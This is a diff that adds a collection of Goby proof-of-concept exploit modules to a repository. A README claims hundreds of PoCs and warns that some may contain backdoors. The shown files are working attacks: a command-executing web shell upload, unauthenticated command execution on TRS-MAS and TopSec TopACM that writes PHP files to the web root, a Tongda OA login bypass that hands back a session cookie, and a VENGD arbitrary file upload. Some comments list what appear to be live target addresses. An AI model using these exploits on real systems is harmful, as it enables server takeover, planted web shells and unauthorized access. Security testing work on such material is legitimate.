107	+	cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
108	+	cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
109	+	cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
110	+	cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
111	+	cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
112	+	cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n"
113	+	cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n"
114	+	cfg.Data += "local t = io.popen(cmd)\r\n"
115	+	cfg.Data += "local a = t:read(\"*all\")\r\n"
116	+	cfg.Data += "ngx.say(a)\r\n"
117	+	cfg.Data += "end\r\n"
118	+	cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
119	+	httpclient.DoHttpRequest(expResult.HostInfo, cfg)
120	+	cmd := ss.Params["cmd"].(string)
121	+	if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 {
122	+	expResult.Success = true
123	+	expResult.Output = resp.Utf8Html
124	+	}
125	+	return expResult
126	+	},
127	+	))
128	+	}
129	+

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/README.md

1	+	# goby-poc
2	+	# 声明
3	+	包含447个自定义goby-poc，是否含有后门和重复自行判断，如果无红队版，可直接poc管理处导入自定义poc即可，共计745个。
4	+	![图片](https://user-images.githubusercontent.com/74171727/185719401-f4782b47-157b-48db-87df-955a65adc487.png)
5	+
6	+
7	+	本程序仅供于学习交流，请使用者遵守《中华人民共和国网络安全法》，勿将此脚本用于非授权的测试，脚本开发者不负任何连带法律责任。
8	+
9	+	Goby POC 仅仅只供对已授权的目标使用测试，对未授权目标的测试，本库不承担责任，均由使用者自行承担。
10	+
11	+
12	+	## ✦✦Star上升曲线✦✦
13	+
14	+	[![Stargazers over time](https://starchart.cc/MY0723/goby-poc.svg)](https://starchart.cc/MY0723/goby-poc)
15	+
16	+

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	)
6	+
7	+	func init() {
8	+	expJson := `{
9	+	"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
10	+	"Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
11	+	"Product": "TRS-MAS",
12	+	"Homepage": "http://www.trs.com.cn/",
13	+	"DisclosureDate": "2022-04-28",
14	+	"Author": "liubye",
15	+	"FofaQuery": "header=\"X-Mas-Server\" \|\| banner=\"X-Mas-Server\"",
16	+	"GobyQuery": "header=\"X-Mas-Server\" \|\| banner=\"X-Mas-Server\"",
17	+	"Level": "3",
18	+	"Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
19	+	"Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>",
20	+	"References": [
21	+	"https://cn-sec.com/archives/966820.html"
22	+	],
23	+	"Is0day": false,
24	+	"HasExp": true,
25	+	"ExpParams": [
26	+	{
27	+	"name": "cmdLine",
28	+	"type": "input",
29	+	"value": "whoami",
30	+	"show": ""
31	+	}
32	+	],
33	+	"ExpTips": {
34	+	"Type": "",
35	+	"Content": ""
36	+	},
37	+	"ScanSteps": [
38	+	"AND",
39	+	{
40	+	"Request": {
41	+	"method": "GET",
42	+	"uri": "/mas/sysinfo/testCommandExecutor.jsp",
43	+	"follow_redirect": true,
44	+	"header": {},
45	+	"data_type": "text",
46	+	"data": ""
47	+	},
48	+	"ResponseTest": {
49	+	"type": "group",
50	+	"operation": "AND",
51	+	"checks": [
52	+	{
53	+	"type": "item",
54	+	"variable": "$code",
55	+	"operation": "==",
56	+	"value": "200",
57	+	"bz": ""
58	+	},
59	+	{
60	+	"type": "item",
61	+	"variable": "$body",
62	+	"operation": "contains",
63	+	"value": "测试命令行进程执行",
64	+	"bz": ""
65	+	}
66	+	]
67	+	},
68	+	"SetVariable": []
69	+	}
70	+	],
71	+	"ExploitSteps": [
72	+	"AND",
73	+	{
74	+	"Request": {
75	+	"method": "GET",
76	+	"uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=",
77	+	"follow_redirect": true,
78	+	"header": {},
79	+	"data_type": "text",
80	+	"data": ""
81	+	},
82	+	"ResponseTest": {
83	+	"type": "group",
84	+	"operation": "AND",
85	+	"checks": [
86	+	{
87	+	"type": "item",
88	+	"variable": "$code",
89	+	"operation": "==",
90	+	"value": "200",
91	+	"bz": ""
92	+	},
93	+	{
94	+	"type": "item",
95	+	"variable": "$body",
96	+	"operation": "contains",
97	+	"value": "测试命令行进程执行",
98	+	"bz": ""
99	+	}
100	+	]
101	+	},
102	+	"SetVariable": []
103	+	}
104	+	],
105	+	"Tags": [
106	+	"Command Execution"
107	+	],
108	+	"VulType": [
109	+	"Command Execution"
110	+	],
111	+	"CVEIDs": [
112	+	""
113	+	],
114	+	"CNNVD": [
115	+	""
116	+	],
117	+	"CNVD": [
118	+	""
119	+	],
120	+	"CVSSScore": "9.7",
121	+	"Translation": {
122	+	"CN": {
123	+	"Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行",
124	+	"Product": "拓尔思-MAS",
125	+	"Description": "<p><span style=\"color: rgb(45, 46, 47); font-size: medium;\">TRS MAS是基于移动互联网时代音视频的使用特点，</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">北京拓尔思信息技术股份有限公司</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">推出的一套通用型媒资管理系统，同一个音视频资源能面向不同的终端平台提供使用，有效节省成本，简化操作。</span></p><p><span style=\"color: rgb(45, 46, 47); font-size: medium;\">TRS MAS </span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">v5、v6版本存在未授权命令执行漏洞，攻击者可以在未授权情况下在服务器上执行任意命令，获取服务器操作权限。</span><br></p>",
126	+	"Recommendation": "<p><span style=\"color: rgb(0, 0, 0); font-size: 18px;\">目前受漏洞影响的版本官方已停止更新，建议使用防御设备进行防护，禁止对 <span style=\"color: rgb(0, 0, 0); font-size: 18px;\">/sysinfo/testCommandExecutor.jsp 路径的访问。</span></span><br></p>",
127	+	"Impact": "<p><span style=\"font-size: medium; color: rgb(45, 46, 47);\">TRS MAS </span><span style=\"font-size: medium; color: rgb(45, 46, 47);\">v5、v6版本存在未授权命令执行漏洞，攻击者可以在未授权情况下在服务器上执行任意命令，获取服务器操作权限。</span><br></p>",
128	+	"VulType": [
129	+	"命令执⾏"
130	+	],
131	+	"Tags": [
132	+	"命令执⾏"
133	+	]
134	+	},
135	+	"EN": {
136	+	"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
137	+	"Product": "TRS-MAS",
138	+	"Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
139	+	"Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>",
140	+	"Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
141	+	"VulType": [
142	+	"Command Execution"
143	+	],
144	+	"Tags": [
145	+	"Command Execution"
146	+	]
147	+	}
148	+	},
149	+	"AttackSurfaces": {
150	+	"Application": null,
151	+	"Support": null,
152	+	"Service": null,
153	+	"System": null,
154	+	"Hardware": null
155	+	}
156	+	}`
157	+
158	+	ExpManager.AddExploit(NewExploit(
159	+	goutils.GetFileName(),
160	+	expJson,
161	+	nil,
162	+	nil,
163	+	))
164	+	}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	"git.gobies.org/goby/goscanner/jsonvul"
6	+	"git.gobies.org/goby/goscanner/scanconfig"
7	+	"git.gobies.org/goby/httpclient"
8	+	"regexp"
9	+	"strings"
10	+	)
11	+
12	+	func init() {
13	+	expJson := `{
14	+	"Name": "Tongda OA Arbitrary User Login Vulnerability",
15	+	"Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
16	+	"Product": "Tongda-OA",
17	+	"Homepage": "https://www.tongda2000.com/",
18	+	"DisclosureDate": "2021-05-20",
19	+	"Author": "[email protected]",
20	+	"FofaQuery": "body=\"/static/templates/2013_01/index.css/\" \|\| body=\"javascript:document.form1.UNAME.focus()\" \|\| body=\"href=\\\"/static/images/tongda.ico\\\"\" \|\| body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" \|\| (body=\"OA提示：不能登录OA\" && body=\"紧急通知：今日10点停电\") \|\| title=\"Office Anywhere 2013\" \|\| title=\"Office Anywhere 2015\" \|\| (body=\"tongda.ico\" && (title=\"OA\" \|\| title=\"办公\")) \|\| body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
21	+	"GobyQuery": "body=\"/static/templates/2013_01/index.css/\" \|\| body=\"javascript:document.form1.UNAME.focus()\" \|\| body=\"href=\\\"/static/images/tongda.ico\\\"\" \|\| body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" \|\| (body=\"OA提示：不能登录OA\" && body=\"紧急通知：今日10点停电\") \|\| title=\"Office Anywhere 2013\" \|\| title=\"Office Anywhere 2015\" \|\| (body=\"tongda.ico\" && (title=\"OA\" \|\| title=\"办公\")) \|\| body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
22	+	"Level": "3",
23	+	"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
24	+	"Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>",
25	+	"References": [
26	+	"https://fofa.so/"
27	+	],
28	+	"Is0day": true,
29	+	"HasExp": true,
30	+	"ExpParams": [],
31	+	"ExpTips": {
32	+	"Type": "",
33	+	"Content": ""
34	+	},
35	+	"ScanSteps": [
36	+	"AND",
37	+	{
38	+	"Request": {
39	+	"method": "GET",
40	+	"uri": "/",
41	+	"follow_redirect": true,
42	+	"header": {},
43	+	"data_type": "text",
44	+	"data": ""
45	+	},
46	+	"ResponseTest": {
47	+	"type": "group",
48	+	"operation": "AND",
49	+	"checks": [
50	+	{
51	+	"type": "item",
52	+	"variable": "$code",
53	+	"operation": "==",
54	+	"value": "200",
55	+	"bz": ""
56	+	}
57	+	]
58	+	},
59	+	"SetVariable": []
60	+	}
61	+	],
62	+	"ExploitSteps": [
63	+	"AND",
64	+	{
65	+	"Request": {
66	+	"method": "GET",
67	+	"uri": "",
68	+	"follow_redirect": true,
69	+	"header": {},
70	+	"data_type": "text",
71	+	"data": ""
72	+	},
73	+	"ResponseTest": {
74	+	"type": "group",
75	+	"operation": "AND",
76	+	"checks": [
77	+	{
78	+	"type": "item",
79	+	"variable": "$code",
80	+	"operation": "==",
81	+	"value": "200",
82	+	"bz": ""
83	+	}
84	+	]
85	+	},
86	+	"SetVariable": []
87	+	}
88	+	],
89	+	"Tags": [
90	+	"Login Bypass"
91	+	],
92	+	"VulType": [
93	+	"Login Bypass"
94	+	],
95	+	"CVEIDs": [
96	+	""
97	+	],
98	+	"CNNVD": [
99	+	""
100	+	],
101	+	"CNVD": [
102	+	""
103	+	],
104	+	"CVSSScore": "9.0",
105	+	"Translation": {
106	+	"CN": {
107	+	"Name": "通达 OA 任意用户登陆漏洞",
108	+	"Product": "通达-OA",
109	+	"Description": "<p>通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。<br></p><p>通达存在任意用户登陆漏洞，攻击者可以通过指定接口登陆任意用户，获取后台管理权限，直接登录后台进行敏感操作。</p>",
110	+	"Recommendation": "<p>请联系官方厂商进行更新。<a href=\"https://www.tongda2000.com/\" target=\"_blank\">https://www.tongda2000.com/</a><br></p>",
111	+	"Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">通达存在任意用户登陆漏洞，攻击者可以通过指定接口登陆任意用户，获取后台管理权限，直接登录后台进行敏感操作。</span><br></p>",
112	+	"VulType": [
113	+	"登录绕过"
114	+	],
115	+	"Tags": [
116	+	"登录绕过"
117	+	]
118	+	},
119	+	"EN": {
120	+	"Name": "Tongda OA Arbitrary User Login Vulnerability",
121	+	"Product": "Tongda-OA",
122	+	"Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
123	+	"Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>",
124	+	"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
125	+	"VulType": [
126	+	"Login Bypass"
127	+	],
128	+	"Tags": [
129	+	"Login Bypass"
130	+	]
131	+	}
132	+	},
133	+	"AttackSurfaces": {
134	+	"Application": null,
135	+	"Support": null,
136	+	"Service": null,
137	+	"System": null,
138	+	"Hardware": null
139	+	}
140	+	}`
141	+
142	+	checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool {
143	+	requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php")
144	+	requestConfig.VerifyTls = false
145	+	requestConfig.FollowRedirect = false
146	+
147	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
148	+	return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda")
149	+	}
150	+	return false
151	+	}
152	+
153	+	getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string {
154	+	requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php")
155	+	requestConfig.VerifyTls = false
156	+	requestConfig.FollowRedirect = false
157	+
158	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
159	+	if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"codeuid\"") {
160	+	return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1]
161	+	}
162	+	}
163	+	return ""
164	+	}
165	+
166	+	getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string {
167	+	requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php")
168	+	requestConfig.VerifyTls = false
169	+	requestConfig.FollowRedirect = false
170	+	requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded")
171	+	requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}"
172	+
173	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
174	+	if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") {
175	+	return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1]
176	+	}
177	+	}
178	+	return ""
179	+	}
180	+
181	+	exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool {
182	+	// 攻击 URL
183	+	requestConfig := httpclient.NewGetRequestConfig("/general/")
184	+	requestConfig.VerifyTls = false
185	+	requestConfig.FollowRedirect = false
186	+	requestConfig.Timeout = 15
187	+	requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid)
188	+
189	+	// 发送攻击请求
190	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
191	+	return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo")
192	+	}
193	+	return false
194	+	}
195	+
196	+	ExpManager.AddExploit(NewExploit(
197	+	goutils.GetFileName(),
198	+	expJson,
199	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
200	+	if checkIsTongdaOA1231234(u) {
201	+	codeuid := getTongdaCodeUID435345(u)
202	+	if codeuid != "" {
203	+	phpsessionid := getTongdaPHPSESSID4564234(codeuid, u)
204	+	if phpsessionid != "" {
205	+	return exploitTongda45321(phpsessionid, u)
206	+	}
207	+	}
208	+	}
209	+
210	+	return false
211	+	},
212	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
213	+
214	+	if checkIsTongdaOA1231234(expResult.HostInfo) {
215	+	codeuid := getTongdaCodeUID435345(expResult.HostInfo)
216	+	if codeuid != "" {
217	+	phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo)
218	+	if phpsessionid != "" {
219	+	if exploitTongda45321(phpsessionid, expResult.HostInfo) {
220	+	expResult.Success = true
221	+	expResult.Output = "登陆成功，使用如下 session 即可登陆：" + phpsessionid
222	+	}
223	+	}
224	+	}
225	+	}
226	+
227	+	return expResult
228	+	},
229	+	))
230	+	}
231	+
232	+	// http://14.18.236.21:8000/

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	"git.gobies.org/goby/goscanner/jsonvul"
6	+	"git.gobies.org/goby/goscanner/scanconfig"
7	+	"git.gobies.org/goby/httpclient"
8	+	"net/url"
9	+	"strings"
10	+	)
11	+
12	+	func init() {
13	+	expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"[email protected]","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20\|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统（TopACM）综合考虑各行业客户需求，为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业，协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞，攻击者可以在系统上执行任意命令，写入文件，获取webshell，读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁，请关注官方更新。<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">天融信上网行为管理系统存在任意命令执行漏洞，攻击者可以在系统上执行任意命令，写入文件，获取webshell，读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}`
14	+
15	+	exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
16	+	// 攻击 URL
17	+	requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=\|%20" + url.QueryEscape(cmd))
18	+	requestConfig.VerifyTls = false
19	+	requestConfig.FollowRedirect = false
20	+	requestConfig.Timeout = 15
21	+
22	+	// 发送攻击请求
23	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
24	+	if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") {
25	+	return true
26	+	}
27	+	}
28	+	return false
29	+	}
30	+
31	+	checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
32	+	// 攻击 URL
33	+	requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php")
34	+	requestConfig.VerifyTls = false
35	+	requestConfig.FollowRedirect = false
36	+	requestConfig.Timeout = 15
37	+
38	+	// 发送攻击请求
39	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
40	+	if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) {
41	+	return true
42	+	}
43	+	}
44	+	return false
45	+	}
46	+
47	+	ExpManager.AddExploit(NewExploit(
48	+	goutils.GetFileName(),
49	+	expJson,
50	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
51	+
52	+	// 生成随机文件名
53	+	randomFileName := goutils.RandomHexString(6)
54	+
55	+	// 漏洞攻击包，POC 使用自删除的文件
56	+	// <?php echo md5(233);unlink(__FILE__);
57	+	if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== \|base64 -d >/var/www/html/"+randomFileName+".php", u) {
58	+	return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u)
59	+	}
60	+
61	+	return false
62	+	},
63	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
64	+
65	+	cmd := ss.Params["cmd"].(string)
66	+
67	+	if exploitTopACM092348783482(cmd, expResult.HostInfo) {
68	+	expResult.Success = true
69	+	expResult.Output = "命令执行成功"
70	+	}
71	+
72	+	return expResult
73	+	},
74	+	))
75	+	}
76	+
77	+	// https://heiwado.cn:8443/

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json

1	+	{
2	+	"Name": "VENGD Arbitrary File Upload",
3	+	"Level": "3",
4	+	"Tags": [
5	+	"getshell"
6	+	],
7	+	"GobyQuery": "title=\"和信下一代云桌面VENGD\"",
8	+	"Description": "和信创天云桌面系统存在任意文件上传",
9	+	"Product": "VENGD",
10	+	"Homepage": "https://www.vesystem.com/products/3",
11	+	"Author": "aetkrad",
12	+	"Impact": "",
13	+	"Recommendation": "",
14	+	"References": [
15	+	"https://blog.csdn.net/weixin_44146996/article/details/115611026"
16	+	],
17	+	"HasExp": true,
18	+	"ExpParams": [
19	+	{
20	+	"Name": "FileContent",
21	+	"Type": "input",
22	+	"Value": "<?php phpinfo(); ?>"
23	+	}
24	+	],
25	+	"ExpTips": {
26	+	"Type": "",
27	+	"Content": ""
28	+	},
29	+	"ScanSteps": [
30	+	"AND",
31	+	{
32	+	"Request": {
33	+	"method": "POST",
34	+	"uri": "/Upload/upload_file.php?l=test",
35	+	"follow_redirect": false,
36	+	"header": {
37	+	"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
38	+	},
39	+	"data_type": "text",
40	+	"data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n<?php\nprint \"{{{str1}}}\";\n?>\n------WebKitFormBoundaryfcKRltGv--",
41	+	"set_variable": [
42	+	"str1\|rand\|str\|7",
43	+	"r1\|rand\|int\|8"
44	+	]
45	+	},
46	+	"ResponseTest": {
